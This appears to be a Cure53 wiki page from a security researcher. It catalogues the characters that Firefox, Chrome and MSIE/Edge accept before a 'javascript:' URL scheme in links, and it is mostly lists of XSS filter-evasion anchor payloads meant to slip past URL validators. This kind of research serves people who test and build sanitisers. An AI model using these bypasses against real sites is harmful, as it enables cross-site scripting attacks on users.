Skip to content

Characters permitted to prefix Schemes in Anchors and Resource URLs

Jump to bottom
Cure53 edited this page Aug 21, 2015 · 1 revision

Often, webservers and clients validate URLs to avoid permitting JavaScript-, Data- and non-HTTP-URIs to prevent XSS and alike. For example, a webserver might check if a user-submitted URL starts with the string "javascript:" and raise a validation error if it does so.

This page lists characters that can be placed before a protocol handler to slightly obfuscate it and potentially trick the validator.

Example:

This might be detected and prohibited by a validator
<a href="javascript:alert(1)">CLICK</a> 

This however might slip through. We want to know what else does.
<a href="
javascript:alert(1)">CLICK</a>

Firefox

If the HTML is reflected directly from the server and not modified, the following characters will work:

<a href="    javascript:123">&#9;</a>
<a href="
javascript:123">&#10;</a>
<a href="
javascript:123">&#13;</a>
<a href=" javascript:123">&#32;</a>

Chrome

If the HTML is reflected directly from the server and not modified, the following characters will work:

<a href="javascript:123">&#1;</a>
<a href="javascript:123">&#2;</a>
<a href="javascript:123">&#3;</a>
<a href="javascript:123">&#4;</a>
<a href="javascript:123">&#5;</a>
<a href="javascript:123">&#6;</a>
<a href="javascript:123">&#7;</a>
<a href="javascript:123">&#8;</a>
<a href="    javascript:123">&#9;</a>
<a href="
javascript:123">&#10;</a>
<a href="javascript:123">&#11;</a>
<a href="javascript:123">&#12;</a>
<a href="
javascript:123">&#13;</a>
<a href="javascript:123">&#14;</a>
<a href="javascript:123">&#15;</a>
<a href="javascript:123">&#16;</a>
<a href="javascript:123">&#17;</a>
<a href="javascript:123">&#18;</a>
<a href="javascript:123">&#19;</a>
<a href="javascript:123">&#20;</a>
<a href="javascript:123">&#21;</a>
<a href="javascript:123">&#22;</a>
<a href="javascript:123">&#23;</a>
<a href="javascript:123">&#24;</a>
<a href="javascript:123">&#25;</a>
<a href="javascript:123">&#26;</a>
<a href="javascript:123">&#27;</a>
<a href="javascript:123">&#28;</a>
<a href="javascript:123">&#29;</a>
<a href="javascript:123">&#30;</a>
<a href="javascript:123">&#31;</a>
<a href="javascript:123">&#32;</a>

If the HTML is later being modified using innerHTML or alike, more characters can be used to obfuscate the URL. Apparently, Chrome transparently removes certain characters when modifying the DOM.

<a href="javascript:123">&#1;</a>
<a href="javascript:123">&#2;</a>
<a href="javascript:123">&#3;</a>
<a href="javascript:123">&#4;</a>
<a href="javascript:123">&#5;</a>
<a href="javascript:123">&#6;</a>
<a href="javascript:123">&#7;</a>
<a href="javascript:123">&#8;</a>
<a href="    javascript:123">&#9;</a>
<a href="
javascript:123">&#10;</a>
<a href="javascript:123">&#11;</a>
<a href="javascript:123">&#12;</a>
<a href="
javascript:123">&#13;</a>
<a href="javascript:123">&#14;</a>
<a href="javascript:123">&#15;</a>
<a href="javascript:123">&#16;</a>
<a href="javascript:123">&#17;</a>
<a href="javascript:123">&#18;</a>
<a href="javascript:123">&#19;</a>
<a href="javascript:123">&#20;</a>
<a href="javascript:123">&#21;</a>
<a href="javascript:123">&#22;</a>
<a href="javascript:123">&#23;</a>
<a href="javascript:123">&#24;</a>
<a href="javascript:123">&#25;</a>
<a href="javascript:123">&#26;</a>
<a href="javascript:123">&#27;</a>
<a href="javascript:123">&#28;</a>
<a href="javascript:123">&#29;</a>
<a href="javascript:123">&#30;</a>
<a href="javascript:123">&#31;</a>
<a href="javascript:123">&#32;</a>
<a href="javascript:123">&#5760;</a>
<a href="javascript:123">&#8192;</a>
<a href="javascript:123">&#8193;</a>
<a href="javascript:123">&#8194;</a>
<a href="javascript:123">&#8195;</a>
<a href="javascript:123">&#8196;</a>
<a href="javascript:123">&#8197;</a>
<a href="javascript:123">&#8198;</a>
<a href="javascript:123">&#8199;</a>
<a href="javascript:123">&#8200;</a>
<a href="javascript:123">&#8201;</a>
<a href="javascript:123">&#8202;</a>
<a href="javascript:123">&#8232;</a>
<a href="javascript:123">&#8287;</a>
<a href="javascript:123">&#12288;</a>

MSIE / Edge

If the HTML is reflected directly from the server and not modified, the following characters will work:

<a href="javascript:123">&#1;</a>
<a href="javascript:123">&#2;</a>
<a href="javascript:123">&#3;</a>
<a href="javascript:123">&#4;</a>
<a href="javascript:123">&#5;</a>
<a href="javascript:123">&#6;</a>
<a href="javascript:123">&#7;</a>
<a href="javascript:123">&#8;</a>
<a href="    javascript:123">&#9;</a>
<a href="
javascript:123">&#10;</a>
<a href="javascript:123">&#11;</a>
<a href="javascript:123">&#12;</a>
<a href="
javascript:123">&#13;</a>
<a href="javascript:123">&#14;</a>
<a href="javascript:123">&#15;</a>
<a href="javascript:123">&#16;</a>
<a href="javascript:123">&#17;</a>
<a href="javascript:123">&#18;</a>
<a href="javascript:123">&#19;</a>
<a href="javascript:123">&#20;</a>
<a href="javascript:123">&#21;</a>
<a href="javascript:123">&#22;</a>
<a href="javascript:123">&#23;</a>
<a href="javascript:123">&#24;</a>
<a href="javascript:123">&#25;</a>
<a href="javascript:123">&#26;</a>
<a href="javascript:123">&#27;</a>
<a href="javascript:123">&#28;</a>
<a href="javascript:123">&#29;</a>
<a href="javascript:123">&#30;</a>
<a href="javascript:123">&#31;</a>
<a href="javascript:123">&#32;</a>

this is a test

Clone this wiki locally